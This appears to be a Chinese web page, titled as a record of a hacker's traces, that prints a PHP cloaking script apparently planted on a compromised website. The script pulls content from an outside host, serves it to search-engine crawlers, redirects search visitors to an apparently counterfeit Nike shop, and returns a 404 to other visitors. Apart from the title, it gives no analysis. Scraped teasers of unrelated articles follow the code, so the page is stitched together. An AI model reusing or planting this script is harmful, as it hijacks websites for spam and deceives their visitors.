黑客作案痕迹

  1 <?php
  2 define("DESURL","http://data.hellotobuy.com/nike/5nike5PuXN7/index.php");
  3 $shellurl = ‘http://‘.$_SERVER[‘HTTP_HOST‘].$_SERVER[‘PHP_SELF‘];
  4
  5 //定义脚本路径
  6 define("SHELLURL",$shellurl);
  7 $host = $_SERVER[‘HTTP_HOST‘];
  8 //echo $_SERVER[‘HTTP_USER_AGENT‘];die;
  9 echo $_SERVER[‘HTTP_ACCEPT_LANGUAGE‘];die;
 10 //判断是否是蜘蛛
 11 function is_spider(){
 12     $robot = 0;
 13     //Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 UBrowser/4.0.3647.11 Safari/537.36
 14     $USER_AGENT = strtolower($_SERVER[‘HTTP_USER_AGENT‘]);
 15     if(strpos($USER_AGENT,"bot")) $robot = 1;
 16     if(strpos($USER_AGENT,"spider")) $robot = 1;
 17     if(strpos($USER_AGENT,"slurp")) $robot = 1;
 18     if(strpos($USER_AGENT,"google")) $robot = 1;
 19     if(strpos($USER_AGENT,"fast-webcrawler")) $robot = 1;
 20     if(strpos($USER_AGENT,"altavista")) $robot = 1;
 21     if(strpos($USER_AGENT,"ia_archiver")) $robot = 1;
 22     return $robot;
 23 }
 24 function p($arr){
 25     echo "<pre>";
 26     print_r($arr);
 27     echo "</pre>";
 28 }
 29
 30 function from_se(){
 31     $fromse = 0;
 32     $REFERER = $_SERVER["HTTP_REFERER"];
 33     if(strpos($REFERER,"google")) $fromse = 1;
 34     if(strpos($REFERER,"yahoo")) $fromse = 1;
 35     if(strpos($REFERER,"bing")) $fromse = 1;
 36     if(strpos($REFERER,"aol")) $fromse = 1;
 37     if(strpos($REFERER,"ask")) $fromse = 1;
 38     return $fromse;
 39 }
 40 //判断是否是中文
 41 function is_lang_zh()
 42 {
 43     $langs=$_SERVER[‘HTTP_ACCEPT_LANGUAGE‘];
 44     if(strpos($langs,"zh")!==false)
 45         return 1;
 46      else
 47      return 0;
 48 }
 49 function GetHttpPage($url) {
 50     $output = ‘‘;
 51     $time_out = 30;
 52     if (function_exists ( ‘curl_init‘ )) {
 53         $ch = curl_init ();
 54         curl_setopt ( $ch, CURLOPT_URL, $url );
 55         curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
 56         curl_setopt ( $ch, CURLOPT_BINARYTRANSFER, true );
 57         curl_setopt ( $ch, CURLOPT_CONNECTTIMEOUT, $time_out );
 58         curl_setopt ( $ch, CURLOPT_FOLLOWLOCATION,1);
 59         curl_setopt ( $ch, CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
 60         $output = curl_exec ( $ch );
 61         curl_close ( $ch );
 62     } elseif (function_exists ( ‘file_get_contents‘ )) {
 63         ini_set(‘user_agent‘, ‘Googlebot/2.1 (+http://www.googlebot.com/bot.html)‘);
 64         $context = stream_context_create(array(‘http‘ => array(‘timeout‘ => $time_out)));
 65         $output = file_get_contents ( $url, false, $context);
 66     } elseif (ini_get ( "allow_url_fopen" ) == "1") {
 67         $errstr = ‘‘;
 68         $errno = ‘‘;
 69         $info = parse_url ( $url );
 70         $fp = fsockopen ( $info ["host"], 80, $errno, $errstr, $time_out ) or exit ( $errstr . "--->" . $errno );
 71         $head = "GET " . $info [‘path‘] . "?" . $info ["query"] . " HTTP/1.1\r\n";
 72         $head .= "Host: " . $info [‘host‘] . "\r\n";
 73         $head .= "Connection: Close\r\n\r\n";
 74         fwrite($fp, $head);
 75         while ( ! feof ( $fp ) ) {
 76             $output .= fgets ( $fp, 128 );
 77         }
 78         fclose ( $fp );
 79     }
 80     return $output;
 81 }
 82     //查询条件    id=123
 83     $qstring=$_SERVER["QUERY_STRING"];
 84     $is_zh=is_lang_zh();
 85     $is_spider = is_spider();
 86     $from_se = from_se();
 87
 88         $htmls = GetHttpPage(DESURL . "?" . $qstring);
 89         $htmls = str_replace("{host}",$host,$htmls);
 90
 91         $desurlmv=DESURL;
 92         $desurlmv = str_ireplace(‘/‘,‘\/‘,$desurlmv);
 93         $htmls=preg_replace(‘/href\s*=\s*(["\‘])‘.$desurlmv.‘/iU‘,‘href=$1‘.SHELLURL, $htmls);
 94         $htmls=preg_replace(‘/href\s*=\s*(["\‘])\//iU‘,‘href=$1‘.SHELLURL, $htmls);
 95         $htmls=preg_replace(‘/href\s*=\s*(["\‘])(?!http)/iU‘,‘href=$1‘.SHELLURL.‘$2‘, $htmls);
 96
 97         $shellurlmv = SHELLURL;
 98         $shellurlmv = str_ireplace(‘?‘,‘‘,$shellurlmv);
 99         $shellurlmv = str_ireplace(‘/‘,‘\/‘,$shellurlmv);
100         $htmls = preg_replace(‘/href\s*=\s*(["\‘])‘.$shellurlmv.‘\?(.*\.css)/iU‘,‘href=$1‘.DESURL.‘$2‘ , $htmls);
101         $htmls = preg_replace(‘/href\s*=\s*(["\‘])‘.$shellurlmv.‘\?(.*\.ico)/iU‘,‘href=$1‘.DESURL.‘$2‘ , $htmls);
102
103         $htmls = preg_replace(‘/src\s*=\s*(["\‘])\//iU‘,‘src=$1‘.DESURL , $htmls);
104         $htmls=preg_replace(‘/src\s*=\s*(["\‘])(?!http)/iU‘,‘src=$1‘.DESURL.‘$2‘, $htmls);
105
106         $htmls=preg_replace(‘/\?\s*(["\‘])/iU‘,‘$1‘, $htmls);
107         $htmls=preg_replace(‘/<input\s*type=\s*["\‘]\s*hidden.*\/\s*>/iU‘,‘‘, $htmls);
108
109     if($is_spider==1)
110     {
111          echo $htmls;
112     }
113     else if($from_se==1)
114     {
115          header("Location: http://nike.hellotobuy.com/");
116     }
117     else
118     {
119          header(‘HTTP/1.1 404 Not Found‘);
120          echo ‘404 Not Found‘;
121     }
122 ?>
时间: 2024-08-28 08:34:36

黑客作案痕迹的相关文章

博客园客户端UAP开发随笔 -- 奔跑吧,页面!

前言 页面导航,是App中的基本功,一般的App,一来一去,只需要简单的Navigate + Back就行了,一个复杂的App可能需要很多导航模式的混合才能实现最佳用户体验. SplashScreen 启动屏幕 我们先从最开始的SplashScreen说起吧.如果你把启动屏幕做成一个Page,启动时先显示一下,然后假装忙乎两秒,跳到下一个主页面开始进入正题,这个好像看上去也很美好.但是当用户玩命儿按Back键时,哦,露出马脚了,启动页面被唤出了.不过这个bug倒是不妨作为一个新奇的体验. MSD

8月第4周业务风控关注 |国家网信办:坚决将“三俗”内容从网络短视频中清理出去

易盾业务风控周报每周呈报值得关注的安全技术和事件,包括但不限于内容安全.移动安全.业务安全和网络安全,帮助企业提高警惕,规避这些似小实大.影响业务健康发展的安全风险. 1. 国家网信办:坚决将"三俗"内容从网络短视频中清理出去 8月23日消息,近日,国家网信办依法约谈"快视频"企业,对其继续大肆传播低俗不良信息,采取暂停更新15天和下架处理.下一步,国家网信办将继续检查相关平台落实整改情况,加大巡查力度,扩大巡查范围,坚决将"三俗"内容从网络短视

Metasploit Framework(3)Meterpreter

文章的格式也许不是很好看,也没有什么合理的顺序 完全是想到什么写一些什么,但各个方面都涵盖到了 能耐下心看的朋友欢迎一起学习,大牛和杠精们请绕道 Meterpreter:是一种高级的,动态的,可拓展的payload 获取系统Shell通常很有用,但是有时候我们需要更深入的"Shell" 比如我想知道目标机器的键盘什么键被按下,或者使目标机器弹出一个提示框等等 meterpreter获取的不是系统的shell meterpreter是完全基于内存DLL注入式payload(不写硬盘) 因

如何抓到入侵网站的黑客?

shotgun ,讲故事的黑客 366 人赞同 利益相关:信息安全从业人员,曾在某大学教过公安部委托培训信息安全硕士<攻防与技术侦破>专业课. ====== 按照时间划分,一次犯罪是由犯罪动机.犯罪方法和犯罪后果三个部分构成的,那么侦破也相应的可以从这三个部分分别入手. 先来看动机,最难侦破的是无动机犯罪,例如走在街上临时起意做了个案子,回家后洗心革面重新做人,这种案子往往会成为“悬案”,除非当事人主动承认或者再次犯案.绝大多数的犯罪都是有动机的,冲突口角.获取利益.炫耀出名等等,发生计算机犯

花无涯带你走进黑客之 小白入门 第一章

最近开始有一个想法, 想谈谈小白如何慢慢学习网络安全相关知识, 有正确得价值观,做正确的事情. 初心也是为了帮助更多人学习到黑客攻防,学会保护自己和身边的人. 写一些自己的分享和经验,每一期可能都有时间就进行更新,感谢大家的支持! 相信每一个对计算机感兴趣的童鞋都有着一颗黑客的心, 我也不例外, 我希望通过一系列的文章让大家了解黑客和网络安全. 不是很会写一些感人故事心得, 更想是通过自己得分享也顺便提升自己 -.- 不是很喜欢在文章里头加特别花哨 过多的图片,也不会怎么配图... 可能阅读起来

防止黑客远程高频率请求网站解决方案

最近给学校做了一个最美系部投票网站,不少人想通过sql注入漏洞攻击网站,我也是被逼无赖好好的和这些人战斗了2天. 一开始他们应该使用了一些工具不断的去检测我的sql注入点,这是我第二次正式做这种大型的投票系统,本来我已近很注意了没有留下注入点. 只是在查询语句中是使用的 sql字符串拼凑,我想查询语句应该不能做什么吧.后来发现他们不断的对拼凑的地方进行攻击,于是我就好好的想了想 也在网站上找了许多资料,发现只要是有sql拼凑的地方就有可能注入漏洞. -- 比如一个: SELECT * FORM

读书笔记——《黑客大曝光》(3/8)

第2部分 终端和服务器攻击 第4章 攻击Windows 4.1 概述 主要分为三个部分: (1)取得合法身份前的攻击手段 (2)取得合法身份后的攻击手段(3)Windows安全功能 4.2 取得合法身份前的攻击手段 远程攻陷一台Windows系统的途径包括: 认证欺骗 网络服务 客户端漏洞 设备驱动程序 4.2.1 认证欺骗攻击 1.猜测和篡改身份认证证书亦依然是获取Windows系统未经授权访问的最轻松途径之一. 2.远程攻击Windows系统的传统方法是攻击Windows的文件和打印共享服务

解析当今的黑客的攻击

互联网使用迅猛发展,黑客攻击的频率和强度有增无减.今天我们所面临的网络威胁,早已不仅仅是早期出现的那些攻击手段,如病毒.木马.间谍软件与网络监听.口令攻击.漏洞攻击等.黑客技术就如同枪械一般,不出则以,一出伤人.那么我们今天就来解析当今的黑客的攻击. 逆向工程 逆向工程是指对软件执行码直接进行分析,可被看做是"开发周期的逆行".实际应用中逆向工程主要分成两种情况:第一种,软件的源代码可用,但描述文档不再适用或者丢失;第二种,软件没有可用的源代码,任何能找到它的源代码的努力都被称为逆向工

天才黑客!17岁打脸乔布斯,20岁搞疯索尼,26岁叫板特斯拉,写2000行代码市值8000万美金

文/创日报 今天说一个屌到飞起的黑客小哥! 扒他的时候创哥就觉得无比的欢快, 因为他的人生用三个字就能概括: “爽!爽!爽!” 不但颜值出众,智商更是卓绝! 89年出生,却把互联网巨头玩弄于股掌间, 17岁仅靠一把螺丝刀,破解了iPhone核心基带, 让iPhone变成了全网通. ▼ 无数人削尖脑袋都挤不进去的 “Google,SpaceX,Facebook” 人家拍拍屁股混了一圈, 说不干就不干! 因为觉得人生太无聊, 顺手破解了索尼的游戏机, 逼的索尼将他告上法庭, 还引发了世!界!级!黑客